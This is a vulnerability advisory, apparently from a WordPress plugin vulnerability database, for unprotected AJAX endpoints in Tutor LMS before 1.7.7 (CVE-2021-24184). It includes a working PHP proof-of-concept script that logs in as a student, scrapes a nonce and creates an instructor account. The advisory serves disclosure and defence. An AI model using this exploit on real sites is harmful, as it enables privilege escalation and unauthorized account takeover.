WordPress Plugin Vulnerabilities

Tutor LMS < 1.7.7 - Unprotected AJAX including Privilege Escalation

Description

Several AJAX endpoints in the plugin were unprotected, allowing students to modify course information and elevate their privileges among many other actions.

Proof of Concept

Only one PoC provided for privilege escalation. 

<?php

// Settings
$wp_url = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];

// 1) Log in as customer
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

// Pull the Nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/index.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

preg_match('/var\stutor_data\s=\s{"delete_confirm_text"\:"Are you sure\?\sit\scan\snot\sbe\sundone\."\,"nonce_key"\:"_wpnonce","_wpnonce":"([^"]+)"/', $content, $matches);
$nonce = $matches[1];
print_r($nonce);

// Update Settings
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'first_name' => 'Instructor',
    'last_name' => 'Instructor',
    'user_login' => 'Instructor',
    'email' => 'Instructor@Instructor.com',
    'phone_number' => '1234567890',
    'password' => 'test',
    'password_confirmation' => 'test',
    'tutor_profile_bio' => '',
    'action' => 'tutor_add_instructor',
    '_wpnonce' => $nonce
]);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);

Affects Plugins

Plugin icon
tutor
Fixed in 1.7.7

References

CVE
CVE-2021-24184
URL
https://www.wordfence.com/blog/2021/03/several-vulnerabilities-patched-in-tutor-lms-plugin/

Classification

Type
PRIVESC
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-269
CVSS
8.1 (high)

Miscellaneous

Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
https://wordfence.com
Submitter twitter
infosecchloe
Verified
Yes
WPVDB ID
5e85917c-7a58-49cb-b8b3-05aa18ffff3e

Timeline

Publicly Published
2021-03-15 (about 3 years ago)
Added
2021-03-15 (about 3 years ago)
Last Updated
2021-03-20 (about 3 years ago)

Other

Published
Title
Published
2017-11-27
Title
Elementor Page Builder < 1.8.0 - Authenticated Unrestricted Editing
Published
2019-01-25
Title
Health Check & Troubleshooting <= 1.2.3 - Authenticated Lack of Authorisation
Published
2023-11-09
Title
WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) < 7.6.7 - Authenticated (Subscriber+) Privilege Escalation
Published
2020-11-09
Title
Ultimate Member < 2.1.12 - Unauthenticated Privilege Escalation via User Roles
Published
2019-12-13
Title
WordPress <= 5.3 - Authenticated Improper Access Controls in REST API